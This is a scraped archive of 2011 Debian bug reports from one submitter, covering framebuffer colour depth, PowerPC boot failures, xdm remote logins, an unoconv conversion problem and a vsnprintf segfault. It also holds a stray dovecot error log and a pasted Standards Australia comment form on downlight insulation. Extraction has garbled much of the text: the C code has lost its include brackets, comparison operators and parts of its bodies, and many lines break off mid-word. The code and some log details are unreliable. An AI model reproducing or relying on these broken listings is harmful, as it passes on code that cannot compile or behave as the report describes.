2011-09-12 11:37:07 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10111/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:08 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/9860/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:09 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/9862/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:09 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10050/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:10 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10025/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:12 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10013/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:13 IMAP(???): Error: 
fchown(/export/home/???/Maildir/.Sent/tmp/1315798632.M862106P16609.thot, -1, 
9111(mailusers)) failed: Operation not 

Bug#397856: groff -ms -Tlatin1 | less -R only works on vt100

2011-08-21 Thread Andrew Buckeridge
Package: less
Version: 436-1
Severity: wishlist

The less options -R or --RAW-CONTROL-CHARS do not work on non-vt100
terminals. http://www.greenwoodsoftware.com/less/news.346.html

Consider: ... | groff -ms -Tlatin1 | less -R

There groff -man uses overstrike which is emulated by less using
terminfo. However, groff -ms ANSI  ESC [ ... m escape sequences are not
translated this way. This does not work on an ibm3151 or tvi950. It
would work if it were translated in a similar way to screen (which is
one possible work around). It would work for wy60 too. It would also
help perldoc too. See bug #243370 which should be filed against perldoc
as perldoc needs to supply the -R option.

The less options -r and --raw-control-chars could remain for complete

This is only a feature enhancement request. It does not exist upstream
so I have CCed it there too.

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Bug#627585: Only depth 8bpp works with XGI Volari Z9s

2011-06-28 Thread Andrew Buckeridge
Package: linux-image-3.0.0-rc4-amd64
Version: 3.0.0~rc4-1~experimental.1
Architecture: i386

Package: linux-image-2.6.32-5-amd64
Version: 2.6.32-31
Architecture: i386

PCA-5612 XGI Volari Z9s works fine on x86 with above and Xorg sis
driver shipped by Debian. Is it endian?

/etc/modules: --
sisfb mode=1600x1200x16 rate=60

/etc/X11/xorg.conf: --
  Section Screen
  DeviceVideo Card
  DefaultDepth  16
  SubSection Display
  Depth  16
  Virtual 1600 1200

Old (5 V vintage) C326PSv2.0 SiS 6326 card also required
video=sisfb:mode:1280x1024x8,rate:60,mem:12288 to work on
CHRP Pegasos2. Colour was muddled for other modes too.

Also DVI output on PCA-5612 not working. Only CRT output works.
Looks like CRT2 type to LCD only selects mode not output.

8bpp is fine for console. Xorg, however needs at least 16bpp.
Though xserver-xorg-video-sis and xserver-xorg-video-trident cover
older cards there is also an XGI card driver upstream.

 Ship missing drivers?

Some diversity with drivers may help Xorg.

See also bug #610710

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Bug#630845: linux-image-2.6.39-2-powerpc: CHRP Pegasos2 boot failure

2011-06-23 Thread Andrew Buckeridge
Package: linux-image-3.0.0-rc3-powerpc
Version: 3.0.0~rc3-1~experimental.1

On Wed, 22 Jun 2011 04:01:38 +0100
Ben Hutchings b...@decadent.org.uk wrote:

  These failed to boot. In all cases stuck at the spinner.
 At a guess, this may be fixed by a change in Linux 3.0-rc1:

 Please can you test Linux 3.0-rc3, currently available in experimental?

Also failed to boot and got stuck at spinner.

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Bug#630845: linux-image-2.6.39-2-powerpc: CHRP Pegasos2 boot failure

2011-06-23 Thread Andrew Buckeridge
Package: linux-image-3.0.0-rc3-powerpc
Version: 3.0.0~rc3-1~experimental.1

Firmware boot command line is: --

vmlinuz-3.0.0-rc3-powerpc video=radeonfb:1400x1050-8@60 panic=60 \

I get this warning. Is it important? Is it related?

  +---+ Configuring linux-image-3.0.0-rc3-powerpc +---+
  |   |
  | Required firmware files may be missing|
  |   |
  | This system is currently running Linux 2.6.32-5-powerpc and you   |
  | are installing Linux 3.0.0-rc3-powerpc.  In the new version some  |
  | of the drivers used on this system may require additional |
  | firmware files:   |
  |   |
  | radeon: radeon/SUMO2_me.bin, radeon/SUMO2_pfp.bin,|
  | radeon/SUMO_me.bin, radeon/SUMO_pfp.bin   |
  |   |
  | Most firmware files are not included in the system because they   |
  | do not conform to the Debian Free Software Guidelines. You may|
  | need to reconfigure the package manager to include the contrib|
  | and non-free sections of the package archive before you can   |
  | install these firmware files. |
  |   |
  |  Ok |
  |   |

I suggest a No, its not ok button too.

Still get warning after I installed these packages: --


$ fgrep radeon/SUMO /var/lib/dpkg/info/firmware-linux-nonfree.list 

If radeon/SUMO2_me.bin, radeon/SUMO2_pfp.bin, radeon/SUMO_me.bin,
radeon/SUMO_pfp.bin are required how do I install them?

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Bug#630778: xdm does not just work

2011-06-17 Thread Andrew Buckeridge
Package: xdm
Version: 1:1.1.10-3

See bug #76929 in particular PAM.

Trying a Wyse Winterm with XDMCP direct. I see the login widget then it
dies. (The Wyse Winterm then starts up and can then RDP login to xrdp
package I have running on system. Really should do X to a Linux box.
Wyse Winterm can not do ssh -X due to a problem with it. This like RDP
carries an unnecessary overhead for properly managed LAN. The X
client-server model is far superior.)

Looks like quite a few more files now need to be changed before xdm
will work. Would be nice if it just worked.

/var/log/xdm.log: --
 Fri Jun 17 10:23:58 2011 xdm info (pid 2232): Starting
 Fri Jun 17 16:23:37 2011 xdm error (pid 2232): Cannot convert Internet 
 address to host name
 Fri Jun 17 16:23:40 2011 xdm info (pid 2232): Starting X server on

Should I really need to put DHCP pool in the DNS? This is a test
machine and some one else looks up reverse for 10.in-addr.arpa.

 0 items in XFree86_VT property!
 Fri Jun 17 16:23:40 2011 xdm info (pid 3901): sourcing /etc/X11/xdm/Xsetup

My config files were patched similar to original post, but I also do
not use xdm for local display.

Xaccess (had to uncomment these): --
*   #any host can get a login window
*   CHOOSER BROADCAST   #any host can get a chooser

These were originally commented out on my install.

xdm-config (had to comment this out): --

This was not originally commented out on my install.

Xservers (commented this out as not needed): --
#:0 local /usr/bin/X :0 vt7 -nolisten tcp

Then tried patching /etc/security/pam_env.conf too: --

These were originally commented out on my install.

Now get login, but don't get session. Goes back to login.

The remote display is

Does xrdb conflict with this package!?

~/.xsession-errors: --
 Xsession: X session started for andrewb at Fri Jun 17 16:49:49 GMT-8 2011
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to ServerClient is not authorized to 
 connect to Server/usr/bin/xsetroot:  unable to open display ''
 Client is not authorized to connect to Server/usr/bin/twm:  unable to open 
 Client is not authorized to connect to Server/usr/bin/xterm Xt error: Can't 
 open display:
 Xsession: X session started for andrewb at Fri Jun 17 16:49:58 GMT-8 2011
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to ServerClient is not authorized to 
 connect to Server/usr/bin/xsetroot:  unable to open display ''
 Client is not authorized to connect to Server/usr/bin/twm:  unable to open 
 Client is not authorized to connect to Server/usr/bin/xterm Xt error: Can't 
 open display:
 Xsession: X session started for andrewb at Fri Jun 17 16:50:15 GMT-8 2011
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to Serverxrdb: Resource temporarily 
 xrdb: Can't open display ''
 Client is not authorized to connect to ServerClient is not authorized to 
 connect to Server/usr/bin/xsetroot:  unable to open display ''
 Client is not authorized to connect to Server/usr/bin/twm:  unable to open 
 Client is not authorized to connect to Server/usr/bin/xterm Xt error: Can't 
 open display:

/var/log/xdm.log: --
 Fri Jun 17 16:46:57 2011 xdm error (pid 3901): fatal IO error 11 (Resource 
 temporarily unavailable)
 Fri Jun 17 16:47:11 2011 xdm error (pid 2232): Cannot convert Internet 
 address to host name
 Fri Jun 17 16:47:14 2011 xdm info (pid 2232): Starting X server on
 0 items in XFree86_VT property!
 Fri Jun 17 16:47:14 2011 xdm info (pid 3980): sourcing /etc/X11/xdm/Xsetup
 Fri Jun 17 16:49:06 2011 xdm info (pid 2232): Shutting down
 Fri Jun 17 16:49:06 2011 xdm info (pid 2232): Exiting
 Fri Jun 17 16:49:12 2011 xdm info (pid 4003): Starting
 Fri Jun 17 16:49:12 2011 xdm error (pid 4003): Cannot convert Internet 
 address to host name
 Fri Jun 17 16:49:12 2011 xdm info (pid 4003): Starting X server on
 0 items in XFree86_VT property!
 Fri Jun 17 16:49:12 2011 xdm info 

Bug#630778: xdm does not just work

2011-06-17 Thread Andrew Buckeridge
Package: xdm
Version: 1:1.1.10-3

Remote display is actually
00:80:64:32:01:70 (Wyse Technology)

The ps command just displayed: --
 5027 ?Ss 0:00 /usr/bin/xdm
 5308 ?Ss 0:00  \_ -

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Bug#630845: linux-image-2.6.39-2-powerpc: CHRP Pegasos2 boot failure

2011-06-17 Thread Andrew Buckeridge
Package: linux-2.6
Version: 2.6.39-2
Severity: normal

Binary packages that have failed to boot on my Pegasos2 are
linux-image-2.6.39-1-powerpc_2.6.39-1 and

There is nothing interesting on the screen.  After loading from firmware
they just stick at one of the characters of a BSD style spinner.

I am running 2.6.32-5-powerpc so this was used to report bug.

As a result I am not able to confirm if bug 627585 has been fixed.

-- Package-specific info:
** Kernel log: boot messages should be attached

** Model information
revision: 1.1 (pvr 8002 0101)
platform: CHRP
model   : Pegasos2
machine : CHRP Pegasos2

** PCI devices:
:00:00.0 Host bridge [0600]: Marvell Technology Group Ltd. 
MV64360/64361/64362 System Controller [11ab:6460] (rev 03)
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast TAbort- TAbort- 
Latency: 0, Cache Line Size: 128 bytes
Interrupt: pin A routed to IRQ 0

:00:01.0 FireWire (IEEE 1394) [0c00]: VIA Technologies, Inc. VT6306/7/8 
[Fire II(M)] IEEE 1394 OHCI Controller [1106:3044] (rev 46) (prog-if 10 [OHCI])
Subsystem: VIA Technologies, Inc. VT6306/7/8 [Fire II(M)] IEEE 1394 
OHCI Controller [1106:3044]
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 0 (8000ns max)
Interrupt: pin A routed to IRQ 9
Region 0: Memory at 80002000 (32-bit, non-prefetchable) [size=2K]
Region 1: I/O ports at 1080 [size=128]
Capabilities: access denied
Kernel driver in use: firewire_ohci

:00:06.0 USB Controller [0c03]: NEC Corporation USB [1033:0035] (rev 43) 
(prog-if 10 [OHCI])
Subsystem: NEC Corporation Hama USB 2.0 CardBus [1033:0035]
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 8 (250ns min, 10500ns max)
Interrupt: pin A routed to IRQ 9
Region 0: Memory at 8000 (32-bit, non-prefetchable) [size=4K]
Capabilities: access denied
Kernel driver in use: ohci_hcd

:00:06.1 USB Controller [0c03]: NEC Corporation USB [1033:0035] (rev 43) 
(prog-if 10 [OHCI])
Subsystem: NEC Corporation Hama USB 2.0 CardBus [1033:0035]
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 8 (250ns min, 10500ns max)
Interrupt: pin B routed to IRQ 9
Region 0: Memory at 80001000 (32-bit, non-prefetchable) [size=4K]
Capabilities: access denied
Kernel driver in use: ohci_hcd

:00:06.2 USB Controller [0c03]: NEC Corporation USB 2.0 [1033:00e0] (rev 
04) (prog-if 20 [EHCI])
Subsystem: Device [0ee4:3383]
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 68 (4000ns min, 8500ns max), Cache Line Size: 32 bytes
Interrupt: pin C routed to IRQ 9
Region 0: Memory at 80002800 (32-bit, non-prefetchable) [size=256]
Capabilities: access denied
Kernel driver in use: ehci_hcd

:00:0c.0 ISA bridge [0601]: VIA Technologies, Inc. VT8231 [PCI-to-ISA 
Bridge] [1106:8231] (rev 10)
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 0
Capabilities: access denied
Kernel driver in use: parport_pc

:00:0c.1 IDE interface [0101]: VIA Technologies, Inc. 
VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE [1106:0571] (rev 06) 
(prog-if 8a [Master SecP PriP])
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- 
Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium TAbort- 
TAbort- MAbort- SERR- PERR- INTx-
Latency: 0
Interrupt: pin ? routed to IRQ 14
Region 0: [virtual] I/O ports at 1000 [size=8]
Region 1: [virtual] I/O ports at 100c [size=4]
Region 2: [virtual] I/O ports at 1010 [size=8]
Region 3: [virtual] I/O ports at 101c [size=4]
Region 4: I/O ports at 1020 [size=16]
Capabilities: access denied
Kernel driver in use: VIA_IDE

Bug#627585: Can not test xgi volari z9s with 2.6.39

2011-06-17 Thread Andrew Buckeridge
I can't run linux-image-2.6.39-2-powerpc 2.6.39-2,
linux-image-2.6.39-1-powerpc 2.6.39-1 or linux-image-2.6.38-2-powerpc
2.6.38-5 as a result I am not able to confirm if bug 627585 has been
fixed on this arch.

These displays are sometimes found on x86 servers.
Some one with such an x86 may be able to test.

See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=630845

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#627585: /boot/vmlinux-2.6.32-5-powerpc: Only depth 8bpp works with XGI Volari Z9s card PCA-5612 when using sisfb

2011-05-22 Thread Andrew Buckeridge
Package: linux-2.6
Version: 2.6.32-31
Severity: normal
File: /boot/vmlinux-2.6.32-5-powerpc

If a depth other than 8 bit is chosen colours are not mapped properly.
The text on the virtual console is not white. The same happens when
X.org is started.

The virtual console is functional at 8 bpp (appart from the DVI port),
but if I force depth with the X server with -- -depth 16, 24 or 32 I get
the same problem.

Many X apps are no longer functional with 256 colours. However, 16 bpp
should be adequate. (i.e. 1400x1050x16 similar to vesa mode 0x0348)

Also the DVI port on the PCA-5612 card is not active. This should mirror
the CRT output. This may be bug #610710.

-- Package-specific info:
** Version:
Linux version 2.6.32-5-powerpc (Debian 2.6.32-31) (b...@decadent.org.uk) (gcc 
version 4.3.5 (Debian 4.3.5-4) ) #1 Mon Mar 7 22:49:07 UTC 2011

** Command line:
video=sisfb:mode:1400x1050x8,rate:60 panic=300 

** Not tainted

** Kernel log:
[5.620254] usb usb3: SerialNumber: :00:0c.2
[5.634551] usb usb3: configuration #1 chosen from 1 choice
[5.647784] hub 3-0:1.0: USB hub found
[5.660707] hub 3-0:1.0: 2 ports detected
[5.673640] firewire_core: created device fw0: GUID 001106004b2f, S400
[5.689507] ohci_hcd :00:06.1: OHCI Host Controller
[5.734225] ohci_hcd :00:06.1: new USB bus registered, assigned bus 
number 4
[5.779583] ohci_hcd :00:06.1: irq 9, io mem 0x80001000
[5.794679] ide-cd driver 5.00
[5.809129] ide-cd: hdc: ATAPI 48X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache
[5.822181] Uniform CD-ROM driver Revision: 3.20
[5.885375] usb usb4: New USB device found, idVendor=1d6b, idProduct=0001
[5.898898] usb usb4: New USB device strings: Mfr=3, Product=2, 
[5.911951] usb usb4: Product: OHCI Host Controller
[5.924925] usb usb4: Manufacturer: Linux 2.6.32-5-powerpc ohci_hcd
[5.938112] usb usb4: SerialNumber: :00:06.1
[5.954113] usb usb4: configuration #1 chosen from 1 choice
[5.967748] hub 4-0:1.0: USB hub found
[5.981646] hub 4-0:1.0: 1 port detected
[5.995123] uhci_hcd :00:0c.3: enabling device ( - 0001)
[6.061666] usb 3-2: new full speed USB device using uhci_hcd and address 2
[6.101632] uhci_hcd :00:0c.3: UHCI Host Controller
[6.121635] uhci_hcd :00:0c.3: new USB bus registered, assigned bus 
number 5
[6.134638] uhci_hcd :00:0c.3: irq 9, io base 0x1060
[6.147287] usb usb5: New USB device found, idVendor=1d6b, idProduct=0001
[6.159729] usb usb5: New USB device strings: Mfr=3, Product=2, 
[6.172033] usb usb5: Product: UHCI Host Controller
[6.184322] usb usb5: Manufacturer: Linux 2.6.32-5-powerpc uhci_hcd
[6.196609] usb usb5: SerialNumber: :00:0c.3
[6.211537] usb usb5: configuration #1 chosen from 1 choice
[6.224707] hub 5-0:1.0: USB hub found
[6.237178] hub 5-0:1.0: 2 ports detected
[6.294778] usb 3-2: not running at top speed; connect to a high speed hub
[6.340797] usb 3-2: New USB device found, idVendor=03f0, idProduct=3417
[6.353363] usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[6.365814] usb 3-2: Product: HP LaserJet 3055
[6.378045] usb 3-2: Manufacturer: Hewlett-Packard
[6.390165] usb 3-2: SerialNumber: 00CNCK544241
[6.404118] usb 3-2: configuration #1 chosen from 1 choice
[6.983152] REISERFS (device hda2): found reiserfs format 3.6 with 
standard journal
[6.995804] REISERFS (device hda2): using ordered data mode
[7.052130] REISERFS (device hda2): journal params: device hda2, size 8192, 
journal first block 18, max trans len 1024, max batch 900, max commit age 30, 
max trans age 30
[7.070240] REISERFS (device hda2): checking transaction log (hda2)
[7.126399] REISERFS (device hda2): Using r5 hash to sort names
[   10.477154] udev[177]: starting version 164
[   12.891899] vt596_smbus :00:0c.4: Enabling SMBus device
[   13.010758] parport_pc: VIA 686A/8231 detected
[   13.010776] parport_pc: probing current configuration
[   13.010840] parport_pc: Current parallel port base: 0x3BC
[   13.010917] parport0: PC-style at 0x3bc, irq 7 [PCSPP]
[   13.155104] parport_pc: VIA parallel port: io=0x3BC, irq=7
[   13.227399] vt8231 :00:0c.4: enabling sensors
[   13.368092] usblp0: USB Bidirectional printer dev 2 if 0 alt 1 proto 2 vid 
0x03F0 pid 0x3417
[   13.415621] usbcore: registered new interface driver usblp
[   14.000388] VIA 82xx Modem :00:0c.6: enabling device ( - 0001)
[   15.289715] VIA 82xx Modem: probe of :00:0c.6 failed with error -13
[   15.315623] VIA 82xx Audio :00:0c.5: enabling device ( - 0001)
[   18.439948] Adding 2096472k swap on /dev/hda5.  Priority:-1 extents:1 
[   21.545262] serio: i8042 KBD port at 0x60,0x64 irq 1
[   21.617170] serio: i8042 AUX port at 0x60,0x64 irq 12
[   21.956728] input: AT Translated Set 2 keyboard as 

Bug#619467: ***SPAM*** Does not convert from HTML to Word

2011-03-24 Thread Andrew Buckeridge
Package: unoconv
Version: 0.4-1

I only mentioned the images in
however it can not layout HTML to page.

If I use: --

unoconv -v -d document -f doc Public_BD58_AS3999_ACIMA.html

This CSS is honored: --

style type=text/css
@page { size: landscape; margin: 1cm }

However, tables do not fit width.

The work around remains the same:
Format/Page Select Page tab, Select Landscape and then OK.
Insert/File ... Public_BD58_AS3999_ACIMA.html ...

Not only do we have images, but HTML table layout is honored.

As the image issue #518938 has been resolved I am posting a separate
Title: Reconstructed FO 630 - Public Comments Form - AS3999 Downlights

Draft Australian Standard - Public Comments

Guidance on Submission of Comments

Comments are invited on the technical content and general arrangement of
drafts. All comments received by the due date will be considered by the
relevant committee. Where appropriate, changes will be incorporated
prior to the formal approval.

If the draft is acceptable without change, an acknowledgement to this
effect would be appreciated.

Comments can be submitted via e-mail to the Project Manager's e-mail
address indicated in the draft. All submission of comments should be on
the attached form which is made up of two sections.
Please complete each section with the following information:

Section 1 - Contact Details

Complete this section with the relevant details.

Section 2 - Draft Details and Comments

Complete this section with the DR number, Committee Number, Draft Title
and Project Manager details. Refer to the draft to obtain these details.
For each of your comments please complete the following details:

Submitted By (S.)

Enter the name of the person submitting the comments. If the same person
is responsible for all of the comments enter "as above", or just leave
all subsequent 'Submitted By' fields blank.

Page Number (Pp)

Enter the page number of the Draft. Only enter the number, do not
enter the word "Page". If your comment refers to the whole document,
leave the column blank.

Clause/Subclause (C.)

Enter the clause/subclause number. The clause/subclause appears in
the draft as a number for each item of text. Only enter numbers. If your
comment refers to the whole document, place General in this column.

Paragraph/Figure/Table (P.)

Enter the paragraph within the clause or figure or table. Only
enter numbers.


Enter your comment here. Your comment should include general
background information or reasons to justify the changes being proposed.

Proposed Change

Enter your modified version of the clause or section of the clause
in this column.

NB: If you wish to submit figures or complex objects in addition to the
textual comments please insert them as separate files in the Comments

Standards Australia does not normally provide information on the results
of comments received. However, should you wish to enquire how your
comment was dealt with, please contact the relevant Project Manager.

On behalf of Standards Australia, thank you for taking the time to
comment on the draft.

Customer Information Service
Freecall within Australia: 1800 035 822
>From Overseas: + 61 2 9237 6171
Email: m...@standards.org.au
Mail: GPO Box 476, Sydney NSW 2001

Section 1 - Contact Details

First Name:
Last Name:
Director / Chairman - Technical committee

BGC IT Department, 7-13 Magnet Road

Canning Vale

Post Code:

Email Address:

Section 2 - Draft Details and Comments

Committee No.:
Thermal Insulation
Draft No.:
Project No:

DR Title:
AS3999 Safety review

Project Manager:
Andrew Caswell
Date of Comment Period:

General Comments
Sub heading






It has been demonstrated that 50mm is sufficient to limit
temperatures for the fixed type 50W dichroic tungsten halogen
down lights. This is a common residential worst case,
but what about HID lighting and concentrated light pipe sources?

Does our duty of care require that we obtain an assurance from
the downlight manufacturer before we proceed?

This would be unworkable given that many downlights do comply with
AS/NZS60598, have no markings and come from unknown sources.
The better solution would be notify the building owner (or primary
contractor) of this situation and advise that they contact an
electrician to sort the problem out. Notification could involve
switching off and tagging affected lighting circuits.
Add a new section after: --
Add required figures.
Note that AS/NZS3000 is currently under review by EL1.

AS/NZS3000 Warning sign

Where recessed luminaires are installed in an accessible roof 

Bug#619450: Oops after loading via-ircc

2011-03-23 Thread Andrew Buckeridge
Package: linux-image-2.6.32-5-powerpc
Version: 2.6.32-31

After upgrading to squeeze userland I now have this Oops.

 [   12.894056] via-ircc: dongle probing not supported, please specify 
 dongle_id module parameter.
 [   12.915795] [ cut here ]
 [   12.936549] kernel BUG at 
 [   12.957929] Oops: Exception in kernel mode, sig: 5 [#1]
 [   12.978908] CHRP
 [   12.999403] Modules linked in: via_ircc(+) vt8231 evdev usblp snd 
 soundcore snd_page_alloc i2c_viapro irda crc_ccitt reiserfs ext4 mbcache jbd2 
 crc16 ide_cd_mod cdrom ata_generic libata scsi_mod uhci_hcd ohci_hcd 
 ide_pci_generic marvell mv643xx_eth firewire_ohci libphy ehci_hcd via_rhine 
 inet_lro usbcore firewire_core crc_itu_t nls_base via82cxxx [last unloaded: 
 [   13.063769] NIP: e272d10c LR: e272d100 CTR: 0008
 [   13.084864] REGS: ddf13c70 TRAP: 0700   Not tainted  (2.6.32-5-powerpc)
 [   13.105675] MSR: 00029032 EE,ME,CE,IR,DR  CR: 42042488  XER: 
 [   13.126313] TASK = ddebcde0[202] 'modprobe' THREAD: ddf12000
 [   13.126513] GPR00: 4030 ddf13d20 ddebcde0 001c 4a6e  
 [   13.147352] GPR08: e11e5288 e264573c  0080 22042442 100256a0 
 [   13.167894] GPR16: bff76770 10706d38   1000c46c 10708ed4 
 [   13.188121] GPR24:  3096  e2730150 dd92e800 ddf13d5c 
 dd92ec18 dd92eb60 
 [   13.228066] NIP [e272d10c] via_ircc_open+0x138/0x16c [via_ircc]
 [   13.247568] LR [e272d100] via_ircc_open+0x12c/0x16c [via_ircc]
 [   13.267177] Call Trace:
 [   13.286322] [ddf13d20] [e272d100] via_ircc_open+0x12c/0x16c [via_ircc] 
 [   13.305367] [ddf13d50] [e272d8b0] via_init_one+0x770/0x880 [via_ircc]
 [   13.324487] [ddf13dd0] [c01bd6bc] local_pci_probe+0x24/0x34
 [   13.343184] [ddf13de0] [c01be740] pci_device_probe+0x68/0xa0
 [   13.361494] [ddf13e10] [c0278638] driver_probe_device+0xd4/0x1a8
 [   13.379876] [ddf13e30] [c027877c] __driver_attach+0x70/0xa4
 [   13.397843] [ddf13e50] [c0277ca8] bus_for_each_dev+0x5c/0xac
 [   13.415410] [ddf13e80] [c0278448] driver_attach+0x24/0x34
 [   13.433026] [ddf13e90] [c02774ec] bus_add_driver+0x118/0x2ac
 [   13.450248] [ddf13eb0] [c0278b64] driver_register+0xd0/0x174
 [   13.467058] [ddf13ed0] [c01be99c] __pci_register_driver+0x4c/0xd4
 [   13.483960] [ddf13ef0] [e2734028] via_ircc_init+0x28/0x58 [via_ircc]
 [   13.500506] [ddf13f00] [c0003f1c] do_one_initcall+0x74/0x218
 [   13.516671] [ddf13f20] [c007b464] sys_init_module+0xe0/0x224
 [   13.532876] [ddf13f40] [c0014dac] ret_from_syscall+0x0/0x40
 [   13.548678] --- Exception: c01 at 0xff5de04
 [   13.548681] LR = 0x100041c0
 [   13.579405] Instruction dump:
 [   13.594338] 40be000c 380001fe 4808 383e b01f00c0 3807 7fc3f378 
 [   13.609265] 4bf0eec9 38004030 901f0158 901f0178 0fe0 4800 
 7f83e378 48000969 
 [   13.624365] ---[ end trace ef5880768dfef5b8 ]---
 [  192.041196] Adding 2096472k swap on /dev/hda5.  Priority:-1 extents:1 

To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#609756: vsnprintf segfaults on second attempt with alloca

2011-01-12 Thread Andrew Buckeridge
Package: libc6
Version: 2.7-18lenny7

It is not a heisenbug as suggested by the file name. Its a hard one. It
fails, but man page malloc example works.

Is this a bug in vsnprintf or my fprint.c?

I use alloca which appears to succeed before calling vsnprintf which
then segfaults.

String is no larger than many auto arrays. Is stack allocation failing

fprint.c - unistdio fprint function - Andrew Buckeridge
#include stdio.h
#include stdarg.h
#include unistd.h
#include alloca.h
#include fprint.h
#include string.h
/* +Ve == bytes written -Ve == bytes required */

int vfnprint(int fdout, int r, const char *fmt, va_list ap)
	int i;
	char *p;


/* NB: alloca may return shit, but no it _IS_ vsnprintf */


/* segfault inside this  */


	if(i0) {
		return 1-2*r;
	if(ir) {
		return ((write(fdout,p,i))==i)?i:-1;
	return -i;

/* +Ve == bytes written -Ve == failure */

int vfprint(int fdout, const char *fmt, va_list ap)
	i=vfnprint(fdout, i, fmt, ap);
		i=vfnprint(fdout, 1-i, fmt, ap);
	return i;

int fprint(int fdout, const char *fmt, ...)
	va_list ap;
	int r;

	va_start(ap, fmt);
	r=vfprint(fdout, fmt, ap);
	return r;

fprint.h - unistdio fprint fuction - Andrew Buckeridge
#define NONSTDBUF 1024

int vfnprint(int fdout, int r, const char *fmt, va_list ap);
int vfprint(int fdout, const char *fmt, va_list ap);
int fprint(int fdout, const char *fmt, ...);

/*BINFMTC: -O -Wuninitialized -Werror -pedantic-errors
Goes away when you strace. With other example in which read from pipe
gets broken up. This is now a hard bug.

#include string.h
#include fprint.c

int main()
	char b[1024];

	/* b[1022]='\n'; */

/* we succeed on first go */

/* we fail on first go but second go segfaults */

/* not reached */

	return 0;

/*BINFMTC: -O -Wuninitialized -Werror -pedantic-errors
The man page example works.
#include string.h
#include unistd.h

   #include stdio.h
   #include stdlib.h
   #include stdarg.h

   char *
   make_message(const char *fmt, ...)
   /* Guess we need no more than 100 bytes. */
   int n, size = 100;
   char *p, *np;
   va_list ap;

   if ((p = malloc(size)) == NULL)
   return NULL;

   while (1) {
   /* Try to print in the allocated space. */
   va_start(ap, fmt);
   n = vsnprintf(p, size, fmt, ap);
   /* If that worked, return the string. */
   if (n  -1  n  size)
   return p;
   /* Else try again with more space. */
   if (n  -1)/* glibc 2.1 */
   size = n+1; /* precisely what is needed */
   else   /* glibc 2.0 */
   size *= 2;  /* twice the old size */
   if ((np = realloc (p, size)) == NULL) {
   return NULL;
   } else {
   p = np;

int main()

	char *s;
	char b[1024];

	/* b[1022]='\n'; */

/* we succeed on first go */

/* we fail on first go but second go segfaults */

/* not reached */

	return 0;

Bug#609756: vsnprintf segfaults on second attempt with alloca

2011-01-12 Thread Andrew Buckeridge
Package: libc6
Version: 2.7-18lenny7

Changing to alloca malloc does not help.
fprint.c - unistdio fprint function - Andrew Buckeridge
#include stdio.h
#include stdarg.h
#include unistd.h
#include stdlib.h
#include fprint.h
#include string.h
/* +Ve == bytes written -Ve == bytes required */

